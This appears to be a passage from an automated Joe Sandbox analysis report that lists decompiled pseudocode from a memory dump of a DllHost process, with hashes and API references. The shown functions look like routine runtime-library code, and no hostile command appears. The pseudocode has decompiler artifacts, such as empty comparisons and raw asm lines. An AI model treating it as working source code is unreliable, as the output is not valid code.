				r8d = _t7;
				E00007FF77FF7191EF1D8(_t6, r10d & 0x0000003f, _t77, _t111,  ==  ? _t66 : ( >  ? _t66 : _t77) + _t77, _t111, _t115, _t120);
				_t24 = E00007FF77FF7191E6B28(_t66, _t111);
				if (_t66 != 0) goto 0x191e25b6;
				_t104 = _t77 + 4;
				r8d = 8;
				E00007FF77FF7191EF1D8(_t24, 0, _t77, _t111, _t104, _t111, _t115, _t120);
				_t129 = _t66;
				_t26 = E00007FF77FF7191E6B28(_t66, _t111);
				if (_t129 == 0) goto 0x191e2680;
				_t123 = _t129 + _t77 * 8;
				_t78 = _t129 + _t104 * 8;
				_t88 =  >  ? _t115 : _t78 - _t123 + 7 >> 3;
				_t64 =  >  ? _t115 : _t78 - _t123 + 7 >> 3;
				if (( >  ? _t115 : _t78 - _t123 + 7 >> 3) == 0) goto 0x191e25f2;
				memset(_t52, _t26, 0 << 0);
				_t126 =  *0x192190a0; // 0x590452ce5669
				r8d = 0x40;
				asm("dec eax");
				 *_t123 =  *(_t132[1]) ^ _t126;
				_t95 =  *0x192190a0; // 0x590452ce5669
				asm("dec eax");
				 *( *( *_t132)) = _t129 ^ _t95;
				_t96 =  *0x192190a0; // 0x590452ce5669
				asm("dec eax");
				( *( *_t132))[1] =  &(_t123[1]) ^ _t96;
				_t98 =  *0x192190a0; // 0x590452ce5669
				r8d = r8d - (_t51 & 0x0000003f);
				asm("dec eax");
				( *( *_t132))[2] = _t78 ^ _t98;
				goto 0x191e2683;
				return 0xffffffff;
			}
























                                                                                                                                                              0x7ff7191e24ec
                                                                                                                                                              0x7ff7191e24ec
                                                                                                                                                              0x7ff7191e24ec
                                                                                                                                                              0x7ff7191e24f1
                                                                                                                                                              0x7ff7191e24f6
                                                                                                                                                              0x7ff7191e2504
                                                                                                                                                              0x7ff7191e2509
                                                                                                                                                              0x7ff7191e250c
                                                                                                                                                              0x7ff7191e2512
                                                                                                                                                              0x7ff7191e2518
                                                                                                                                                              0x7ff7191e2526
                                                                                                                                                              0x7ff7191e2536
                                                                                                                                                              0x7ff7191e2539
                                                                                                                                                              0x7ff7191e253c
                                                                                                                                                              0x7ff7191e253f
                                                                                                                                                              0x7ff7191e2545
                                                                                                                                                              0x7ff7191e2553
                                                                                                                                                              0x7ff7191e255d
                                                                                                                                                              0x7ff7191e2561
                                                                                                                                                              0x7ff7191e2564
                                                                                                                                                              0x7ff7191e2567
                                                                                                                                                              0x7ff7191e256e
                                                                                                                                                              0x7ff7191e2570
                                                                                                                                                              0x7ff7191e2570
                                                                                                                                                              0x7ff7191e257a
                                                                                                                                                              0x7ff7191e2584
                                                                                                                                                              0x7ff7191e258c
                                                                                                                                                              0x7ff7191e258e
                                                                                                                                                              0x7ff7191e2592
                                                                                                                                                              0x7ff7191e259e
                                                                                                                                                              0x7ff7191e25a5
                                                                                                                                                              0x7ff7191e25a8
                                                                                                                                                              0x7ff7191e25b0
                                                                                                                                                              0x7ff7191e25bd
                                                                                                                                                              0x7ff7191e25c1
                                                                                                                                                              0x7ff7191e25d9
                                                                                                                                                              0x7ff7191e25dd
                                                                                                                                                              0x7ff7191e25e0
                                                                                                                                                              0x7ff7191e25e8
                                                                                                                                                              0x7ff7191e25eb
                                                                                                                                                              0x7ff7191e25f2
                                                                                                                                                              0x7ff7191e2611
                                                                                                                                                              0x7ff7191e2617
                                                                                                                                                              0x7ff7191e261a
                                                                                                                                                              0x7ff7191e262d
                                                                                                                                                              0x7ff7191e2636
                                                                                                                                                              0x7ff7191e263c
                                                                                                                                                              0x7ff7191e264d
                                                                                                                                                              0x7ff7191e2656
                                                                                                                                                              0x7ff7191e265a
                                                                                                                                                              0x7ff7191e2666
                                                                                                                                                              0x7ff7191e266f
                                                                                                                                                              0x7ff7191e267a
                                                                                                                                                              0x7ff7191e267e
                                                                                                                                                              0x7ff7191e269b

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivilegeRelease
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 113639715-0
                                                                                                                                                              • Opcode ID: cde382f8e5307307205620c5d502358017ec6730a3390b04f8dcf2adaaac045e
                                                                                                                                                              • Instruction ID: 28e4cd6a3b72814cf3590df35aa09a30457a25db103858b6d2eaa59f6c5c69f0
                                                                                                                                                              • Opcode Fuzzy Hash: cde382f8e5307307205620c5d502358017ec6730a3390b04f8dcf2adaaac045e
                                                                                                                                                              • Instruction Fuzzy Hash: 4341D222714E5986FF04DF2AE9241A9B3B1BB48FE8B899432DE0D97B54DF7CC0469340
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191CD470 Relevance: .1, Instructions: 124COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E00007FF77FF7191CD470(unsigned int __rax, long long __rbx, char* __rcx, signed int __rdx, long long __rsi, void* __r9, void* __r10, long long _a8, long long _a16) {
				unsigned int _t61;
				signed int _t97;
				void* _t101;
				unsigned int _t120;

				_a16 = __rsi;
				r10d =  *__rdx;
				r10d = r10d & 0x0000003f;
				_t61 = __r10 + 3 >> 2;
				_t120 = _t61;
				if (_t120 == 0) goto 0x191cd4c6;
				r9d = _t61;
				asm("rol ecx, 0x8");
				asm("ror edx, 0x8");
				 *(__rdx + (__r9 + 7) * 4 - 4) =  *(__rdx + (__r9 + 7) * 4 - 4) & 0xff00ff00 |  *(__rdx + (__r9 + 7) * 4 - 4) & 0x00ff00ff;
				if (_t120 != 0) goto 0x191cd4a0;
				_t126 = __rax >> 2;
				_a8 = __rbx;
				 *(__rdx + (__rax >> 2) * 4 + 0x1c) = 0xffffff80 << ( !r10d & 0x00000003) << 0x00000003 &  *(__rdx + (__rax >> 2) * 4 + 0x1c) | 0x00000080 << ( !r10d & 0x00000003) << 0x00000003;
				if (r10d - 0x37 <= 0) goto 0x191cd514;
				if (r10d - 0x3c >= 0) goto 0x191cd50a;
				 *(__rdx + 0x58) = 0;
				E00007FF77FF7191CC200(__rdx, __rdx);
				goto 0x191cd521;
				_t101 = (r10d >> 2) + 1;
				if (_t101 - 0xe >= 0) goto 0x191cd53f;
				r8d = 0xe;
				r8d = r8d - _t101;
				E00007FF77FF7191D4A30(_t101, 0, __rdx + (_t126 + 7) * 4, __rdx, __rdx + (__rax >> 2) * 4 << 2);
				 *(__rdx + 0x54) =  *(__rdx + 4) << 0x00000003 |  *__rdx >> 0x0000001d;
				 *(__rdx + 0x58) = __rdx * 8;
				E00007FF77FF7191CC200(__rdx, __rdx);
				 *__rcx =  *(__rdx + 0xb) & 0x000000ff;
				 *((char*)(__rcx + 1)) =  *(__rdx + 0xa) & 0x000000ff;
				 *((char*)(__rcx + 2)) =  *(__rdx + 8) >> 8;
				 *((char*)(__rcx + 3)) =  *(__rdx + 8) & 0x000000ff;
				 *((char*)(__rcx + 4)) =  *(__rdx + 0xf) & 0x000000ff;
				 *((char*)(__rcx + 5)) =  *(__rdx + 0xe) & 0x000000ff;
				 *((char*)(__rcx + 6)) =  *(__rdx + 0xc) >> 8;
				 *((char*)(__rcx + 7)) =  *(__rdx + 0xc) & 0x000000ff;
				 *((char*)(__rcx + 8)) =  *(__rdx + 0x13) & 0x000000ff;
				 *((char*)(__rcx + 9)) =  *(__rdx + 0x12) & 0x000000ff;
				 *((char*)(__rcx + 0xa)) =  *(__rdx + 0x10) >> 8;
				 *((char*)(__rcx + 0xb)) =  *(__rdx + 0x10) & 0x000000ff;
				 *((char*)(__rcx + 0xc)) =  *(__rdx + 0x17) & 0x000000ff;
				 *((char*)(__rcx + 0xd)) =  *(__rdx + 0x16) & 0x000000ff;
				 *((char*)(__rcx + 0xe)) =  *(__rdx + 0x14) >> 8;
				 *((char*)(__rcx + 0xf)) =  *(__rdx + 0x14) & 0x000000ff;
				 *((char*)(__rcx + 0x10)) =  *(__rdx + 0x1b) & 0x000000ff;
				 *((char*)(__rcx + 0x11)) =  *(__rdx + 0x1a) & 0x000000ff;
				 *((char*)(__rcx + 0x12)) =  *(__rdx + 0x18) >> 8;
				_t97 =  *(__rdx + 0x18) & 0x000000ff;
				 *(__rcx + 0x13) = _t97;
				return _t97;
			}







                                                                                                                                                              0x7ff7191cd470
                                                                                                                                                              0x7ff7191cd47a
                                                                                                                                                              0x7ff7191cd480
                                                                                                                                                              0x7ff7191cd48b
                                                                                                                                                              0x7ff7191cd48e
                                                                                                                                                              0x7ff7191cd490
                                                                                                                                                              0x7ff7191cd492
                                                                                                                                                              0x7ff7191cd4aa
                                                                                                                                                              0x7ff7191cd4ad
                                                                                                                                                              0x7ff7191cd4be
                                                                                                                                                              0x7ff7191cd4c4
                                                                                                                                                              0x7ff7191cd4cc
                                                                                                                                                              0x7ff7191cd4d6
                                                                                                                                                              0x7ff7191cd4f5
                                                                                                                                                              0x7ff7191cd4fd
                                                                                                                                                              0x7ff7191cd505
                                                                                                                                                              0x7ff7191cd507
                                                                                                                                                              0x7ff7191cd50d
                                                                                                                                                              0x7ff7191cd512
                                                                                                                                                              0x7ff7191cd51a
                                                                                                                                                              0x7ff7191cd51f
                                                                                                                                                              0x7ff7191cd521
                                                                                                                                                              0x7ff7191cd52d
                                                                                                                                                              0x7ff7191cd53a
                                                                                                                                                              0x7ff7191cd555
                                                                                                                                                              0x7ff7191cd55b
                                                                                                                                                              0x7ff7191cd55e
                                                                                                                                                              0x7ff7191cd56c
                                                                                                                                                              0x7ff7191cd572
                                                                                                                                                              0x7ff7191cd57b
                                                                                                                                                              0x7ff7191cd582
                                                                                                                                                              0x7ff7191cd589
                                                                                                                                                              0x7ff7191cd590
                                                                                                                                                              0x7ff7191cd599
                                                                                                                                                              0x7ff7191cd5a0
                                                                                                                                                              0x7ff7191cd5a7
                                                                                                                                                              0x7ff7191cd5ae
                                                                                                                                                              0x7ff7191cd5b7
                                                                                                                                                              0x7ff7191cd5be
                                                                                                                                                              0x7ff7191cd5c5
                                                                                                                                                              0x7ff7191cd5cc
                                                                                                                                                              0x7ff7191cd5d5
                                                                                                                                                              0x7ff7191cd5dc
                                                                                                                                                              0x7ff7191cd5e3
                                                                                                                                                              0x7ff7191cd5ea
                                                                                                                                                              0x7ff7191cd5f3
                                                                                                                                                              0x7ff7191cd5f6
                                                                                                                                                              0x7ff7191cd5fa
                                                                                                                                                              0x7ff7191cd607

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c9925b32f47a594f945beed420c3c5ef810169b357c6c6f0dd543971364c03a9
                                                                                                                                                              • Instruction ID: b88739794de95913a572d1ffe6e0e6bb5b304c4c5781acf94c086c8f8fe55adc
                                                                                                                                                              • Opcode Fuzzy Hash: c9925b32f47a594f945beed420c3c5ef810169b357c6c6f0dd543971364c03a9
                                                                                                                                                              • Instruction Fuzzy Hash: DD5193676192D09FD319CF69A1500ADBFB0F366340748C06AD7E683B43C62CF6A9D721
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191EC840 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00007FF77FF7191EC840(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t25;

				_t25 = __r8;
				r8d = 0;
				 *0x1921bcf0 = r8d;
				_t1 = _t25 + 1; // 0x1
				r9d = _t1;
				asm("cpuid");
				_v16 = r9d;
				_v16 = 0;
				_v20 = __ebx;
				_v12 = __edx;
				if (0 != 0x18001000) goto 0x191ec8a1;
				asm("xgetbv");
				_a8 = __rdx << 0x00000020 | __rax;
				r8d =  *0x1921bcf0; // 0x1
				r8d =  ==  ? r9d : r8d;
				 *0x1921bcf0 = r8d;
				 *0x1921bcf4 = r8d;
				return 0;
			}







                                                                                                                                                              0x7ff7191ec840
                                                                                                                                                              0x7ff7191ec846
                                                                                                                                                              0x7ff7191ec84b
                                                                                                                                                              0x7ff7191ec852
                                                                                                                                                              0x7ff7191ec852
                                                                                                                                                              0x7ff7191ec859
                                                                                                                                                              0x7ff7191ec85b
                                                                                                                                                              0x7ff7191ec863
                                                                                                                                                              0x7ff7191ec869
                                                                                                                                                              0x7ff7191ec86d
                                                                                                                                                              0x7ff7191ec873
                                                                                                                                                              0x7ff7191ec877
                                                                                                                                                              0x7ff7191ec881
                                                                                                                                                              0x7ff7191ec88b
                                                                                                                                                              0x7ff7191ec896
                                                                                                                                                              0x7ff7191ec89a
                                                                                                                                                              0x7ff7191ec8a1
                                                                                                                                                              0x7ff7191ec8af

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 8b737d66365e8bf0f08d5e79424fc9c4b8be0e793beda0aedec613e5b2c53612
                                                                                                                                                              • Instruction ID: 5c6ba225ea1ec8e535692871ebe272296f8e951473e062c1eacd39e1e0ed482d
                                                                                                                                                              • Opcode Fuzzy Hash: 8b737d66365e8bf0f08d5e79424fc9c4b8be0e793beda0aedec613e5b2c53612
                                                                                                                                                              • Instruction Fuzzy Hash: DAF04471A186568AEB949F29A802A29B7B0F748394B80807DD58983A08DE3C90658F14
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D3100 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: cb1a4e6b7bc5ed0c34cd4b472d2bb1e8fc1d875a4390062ba06b77696bb6ce09
                                                                                                                                                              • Instruction ID: 75135cca1d20813d54885d7db0f7a587ad2d7016508375e53a1d97fc80c9303a
                                                                                                                                                              • Opcode Fuzzy Hash: cb1a4e6b7bc5ed0c34cd4b472d2bb1e8fc1d875a4390062ba06b77696bb6ce09
                                                                                                                                                              • Instruction Fuzzy Hash: EAA00131A4CC07D0FA48BF00B895060A271BB50368B800571D11E410A4AE2CA48BE624
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E7F28 Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                              			E00007FF77FF7191E7F28(void* __edi, void* __esp, void* __eflags, void* __rcx, long long __rdi, long long _a8) {
				void* _v4;
				int _t13;
				void* _t38;
				void* _t55;

				E00007FF77FF7191E76B4(0, _t38, "AreFileApisANSI", _t55, 0x19207d08, 0x19207d0c);
				E00007FF77FF7191E76B4(1, _t38, "CompareStringEx", _t55, 0x19207d20, "CompareStringEx");
				E00007FF77FF7191E76B4(2, _t38, "EnumSystemLocalesEx", _t55, 0x19207d38, "EnumSystemLocalesEx");
				E00007FF77FF7191E76B4(8, _t38, "GetDateFormatEx", _t55, 0x19207db0, "GetDateFormatEx");
				E00007FF77FF7191E76B4(0xb, _t38, "GetLocaleInfoEx", _t55, 0x19207dc8, "GetLocaleInfoEx");
				E00007FF77FF7191E76B4(0xe, _t38, "GetTimeFormatEx", _t55, 0x19207de0, "GetTimeFormatEx");
				E00007FF77FF7191E76B4(0xf, _t38, "GetUserDefaultLocaleName", _t55, 0x19207df8, "GetUserDefaultLocaleName");
				E00007FF77FF7191E76B4(0x13, _t38, "IsValidLocaleName", _t55, 0x19207e48, "IsValidLocaleName");
				E00007FF77FF7191E76B4(0x14, _t38, "LCMapStringEx", _t55, 0x19207e68, "LCMapStringEx");
				_t13 = E00007FF77FF7191E76B4(0x15, _t38, "LCIDToLocaleName", _t55, 0x19207e80, "LCIDToLocaleName");
				goto E00007FF77FF7191E76B4;
				asm("int3");
				asm("int3");
				_a8 = __rdi;
				asm("dec eax");
				memset(__edi, _t13, 0x16 << 0);
				return 1;
			}







                                                                                                                                                              0x7ff7191e7f43
                                                                                                                                                              0x7ff7191e7f62
                                                                                                                                                              0x7ff7191e7f81
                                                                                                                                                              0x7ff7191e7fa0
                                                                                                                                                              0x7ff7191e7fbf
                                                                                                                                                              0x7ff7191e7fde
                                                                                                                                                              0x7ff7191e7ffd
                                                                                                                                                              0x7ff7191e801c
                                                                                                                                                              0x7ff7191e803b
                                                                                                                                                              0x7ff7191e805a
                                                                                                                                                              0x7ff7191e807d
                                                                                                                                                              0x7ff7191e8082
                                                                                                                                                              0x7ff7191e8083
                                                                                                                                                              0x7ff7191e8084
                                                                                                                                                              0x7ff7191e80a1
                                                                                                                                                              0x7ff7191e80aa
                                                                                                                                                              0x7ff7191e80b4

                                                                                                                                                              APIs
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF7191E7F43
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF7191E7F62
                                                                                                                                                                • Part of subcall function 00007FF7191E76B4: GetProcAddress.KERNEL32(?,?,0000000100000006,00007FF7191E7B92,?,?,8000000000000000,00007FF7191E5C8A,?,?,8000000000000000,00007FF7191DC85D), ref: 00007FF7191E780C
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF7191E7F81
                                                                                                                                                                • Part of subcall function 00007FF7191E76B4: LoadLibraryExW.KERNEL32(?,?,0000000100000006,00007FF7191E7B92,?,?,8000000000000000,00007FF7191E5C8A,?,?,8000000000000000,00007FF7191DC85D), ref: 00007FF7191E7757
                                                                                                                                                                • Part of subcall function 00007FF7191E76B4: GetLastError.KERNEL32(?,?,0000000100000006,00007FF7191E7B92,?,?,8000000000000000,00007FF7191E5C8A,?,?,8000000000000000,00007FF7191DC85D), ref: 00007FF7191E7765
                                                                                                                                                                • Part of subcall function 00007FF7191E76B4: LoadLibraryExW.KERNEL32(?,?,0000000100000006,00007FF7191E7B92,?,?,8000000000000000,00007FF7191E5C8A,?,?,8000000000000000,00007FF7191DC85D), ref: 00007FF7191E77A7
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF7191E7FA0
                                                                                                                                                                • Part of subcall function 00007FF7191E76B4: FreeLibrary.KERNEL32(?,?,0000000100000006,00007FF7191E7B92,?,?,8000000000000000,00007FF7191E5C8A,?,?,8000000000000000,00007FF7191DC85D), ref: 00007FF7191E77E0
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF7191E7FBF
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF7191E7FDE
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF7191E7FFD
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF7191E801C
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF7191E803B
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF7191E805A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                                                                                                                              • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                                                                                                                              • API String ID: 3255926029-3252031757
                                                                                                                                                              • Opcode ID: 60d8d2b8b26db01f9a645cd0b99cb1464284d4e4dfa43632ebe28b79fd046266
                                                                                                                                                              • Instruction ID: f9ac6076377b2966ff0812436ed72346c0b9c9c497f3d52e134a2e1271c72def
                                                                                                                                                              • Opcode Fuzzy Hash: 60d8d2b8b26db01f9a645cd0b99cb1464284d4e4dfa43632ebe28b79fd046266
                                                                                                                                                              • Instruction Fuzzy Hash: B9316260909E0BA1FA85FF94EC405F0A739AF5432CFC81072D10D561A19F7CAA8FD360
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D09D4 Relevance: 22.7, APIs: 15, Instructions: 205COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandle$AttributesErrorFileLast__std_fs_open_handle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1051874144-0
                                                                                                                                                              • Opcode ID: e6a1a0f42d099e5c99db31b703860c5bef2024190bd97f155d2e966e7b316c7a
                                                                                                                                                              • Instruction ID: 9d39a0f43afe3736bb4bb9d14e69508ad65c3a40a7a93fcfbdf085e801f4b5bb
                                                                                                                                                              • Opcode Fuzzy Hash: e6a1a0f42d099e5c99db31b703860c5bef2024190bd97f155d2e966e7b316c7a
                                                                                                                                                              • Instruction Fuzzy Hash: 4E815132B08E0645F764AF65B818679A2F1AF457BCF940734D93D476D0DE2CE48BD260
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191B3430 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 40%
                                                                                                                                                              			E00007FF77FF7191B3430(long long __rbx, long long __rcx, void* __rdx, long long __rsi, intOrPtr* __r8, intOrPtr* __r9) {
				void* __rdi;
				void* __rbp;
				void* __r12;
				void* __r14;
				void* __r15;
				void* _t70;
				void* _t72;
				void* _t82;
				signed long long _t99;
				intOrPtr _t104;
				intOrPtr* _t117;
				void* _t121;
				void* _t124;
				intOrPtr* _t126;
				intOrPtr _t135;
				void* _t151;
				void* _t154;
				intOrPtr _t155;
				intOrPtr _t156;
				intOrPtr _t159;
				void* _t162;
				intOrPtr* _t170;
				long long _t172;
				void* _t174;
				void* _t175;
				void* _t177;
				long long _t189;
				void* _t191;
				void* _t193;
				void* _t194;

				 *((long long*)(_t177 + 0x18)) = __rbx;
				 *((long long*)(_t177 + 0x20)) = __rsi;
				_t175 = _t177 - 0x37;
				_t99 =  *0x192190a0; // 0x590452ce5669
				 *(_t175 + 0x27) = _t99 ^ _t177 - 0x00000090;
				_t170 = __r9;
				_t194 = __rdx;
				_t117 = __rcx;
				 *((long long*)(_t175 - 0x21)) = __rcx;
				r12d = 0;
				 *((intOrPtr*)(_t175 - 0x29)) = r12d;
				 *((long long*)(__rcx)) = _t189;
				 *((long long*)(__rcx + 0x10)) = _t189;
				 *((long long*)(__rcx + 0x18)) = 0xf;
				 *((intOrPtr*)(__rcx)) = r12b;
				 *((intOrPtr*)(_t175 - 0x29)) = 1;
				r14d = E00007FF77FF7191D07B0();
				if ( *((long long*)(__r8 + 0x18)) - 8 < 0) goto 0x191b34a2;
				_t164 =  *((intOrPtr*)(__r8));
				 *((long long*)(_t175 - 0x39)) =  *((intOrPtr*)(__r8));
				 *((long long*)(_t175 - 0x31)) =  *((intOrPtr*)(__r8 + 0x10));
				asm("movaps xmm0, [ebp-0x39]");
				asm("movdqa [ebp-0x39], xmm0");
				E00007FF77FF7191BB380(_t72, r14d,  *((intOrPtr*)(__r8 + 0x10)), __rcx, _t175 + 7, _t175, _t175 - 0x39);
				if ( *((long long*)(_t170 + 0x18)) - 8 < 0) goto 0x191b34d2;
				 *((long long*)(_t175 - 0x39)) =  *_t170;
				 *((long long*)(_t175 - 0x31)) =  *((intOrPtr*)(_t170 + 0x10));
				asm("movaps xmm0, [ebp-0x39]");
				asm("movdqa [ebp-0x39], xmm0");
				_t121 = _t175 - 0x19;
				E00007FF77FF7191BB380(_t72, r14d,  *((intOrPtr*)(_t170 + 0x10)), _t117, _t121, _t175, _t175 - 0x39);
				r14d = 4;
				_t74 =  ==  ? r14d : 8;
				_t124 = _t121 +  *((intOrPtr*)(_t194 + 8)) +  *((intOrPtr*)(_t175 - 9)) +  *((intOrPtr*)(_t175 + 0x17));
				_t172 =  *((intOrPtr*)(_t117 + 0x10));
				if (_t172 - _t124 > 0) goto 0x191b3597;
				_t104 =  *((intOrPtr*)(_t117 + 0x18));
				_t82 = _t104 - _t124;
				if (_t82 == 0) goto 0x191b3597;
				if (_t82 >= 0) goto 0x191b353d;
				_t126 = _t117;
				E00007FF77FF7191BC600(_t126, _t124 - _t172, _t164, _t194);
				 *((long long*)(_t117 + 0x10)) = _t172;
				goto 0x191b3597;
				if (_t126 - 0x10 >= 0) goto 0x191b3597;
				if (_t104 - 0x10 < 0) goto 0x191b3597;
				_t165 =  *_t117;
				E00007FF77FF7191D4380();
